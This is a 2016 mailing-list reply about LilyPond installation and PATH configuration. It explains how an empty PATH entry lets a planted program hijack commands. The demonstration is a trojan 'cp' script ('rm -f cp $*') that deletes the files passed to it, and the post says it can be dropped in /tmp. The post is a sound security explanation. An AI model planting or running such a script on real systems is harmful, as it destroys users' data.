Re: install frescoba 2.18.2 in Ubuntu

[David Wright]

On Thu 03 Mar 2016 at 22:02:14 (+0100), Urs Liska wrote:
> 
> 
> Am 03.03.2016 um 21:36 schrieb David Wright:
> > On Thu 03 Mar 2016 at 12:41:28 (+0100), Urs Liska wrote:
> >
> >> The LilyPond installation is really trouble-less, and I have the feeling
> >> that all the confusion came up because someone mixed LilyPond and
> >> Frescobaldi.
> >>
> >> If you don't want to install LilyPond using apt-get (for example because
> >> you are recommended to use a newer version) you can simply download the
> >> installation script and run it using "sh path/to/downloaded/script.sh".
> >> This will install LilyPond locally in your user account. There are no
> >> further dependencies or the need of administrator rights.
> >> The only thing that *may* be needed is to add the ~/bin directory to
> >> your $PATH.
> > Most people will have ~/bin in their $PATH, as you know. 
> 
> But there *are* distributions that don't have ~/bin at all by default.
> Don't recall where I encountered that, but it happens.

Yes, Debian didn't _create_ it, and doesn't AFAIK. If it already
exists, the default bash startup file will add it to the beginning
of $PATH (whereas I prefer the end).

Perhaps I'm wrong in my assumption that most linux users have written
something, if only a script, that they want to execute once in a while
without wanting to type   path/to/something   or   sh something   and
they will therefore have created and populated ~/bin.

> > For those that
> > don't (and who are unlikely to have edited their PATH before, I think
> > it might be sensible to show an example of what it will look like,
> > emphasising that : is a separator, not a terminator or delimiter. I've
> > known people add a security vulnerability to their system by getting
> > this wrong. (It puts any directory into your $PATH while you're in it.)
> 
> Just out of curiosity: could you give a more concrete hint (without
> exposing anybody to copy-and-paste-risk)?

OK. This one is quite pernicious, but depends on having the : at the
beginning of $PATH, which might happen if someone thought the syntax
was meant to be, say, PATH=:patha:pathb:and-so-on:

$ echo $PATH
:/usr/local/bin:/usr/bin:/bin:
$ ls -l
total 12
-rwxr--r-- 1 luser luser 25 Mar  3 23:29 cp
-rw-r--r-- 1 luser luser 17 Mar  3 23:29 important-file1
-rw-r--r-- 1 luser luser 17 Mar  3 23:29 important-file2
$ cat important-file1
some information
$ cat important-file2
more information
$ cat cp
rm -f cp $* 2> /dev/null
$ which cp        [the luser won't type this command of course]
./cp              [I'm just showing you the trigger]
$ cp important-file1 important-file2 ../backup-directory/
$ ls -l
total 0
$ which cp
/bin/cp           [showing normality is restored]
$

cp deletes whatever arguments are passed to it, and also itself.
2> /dev/null means you don't see the error message causd by trying to
delete a directory.

Your enemy puts cp somewhere like /tmp/cp, makes it world-executable,
then waits for someone to   cd /tmp   and copy some files.

Cheers,
David.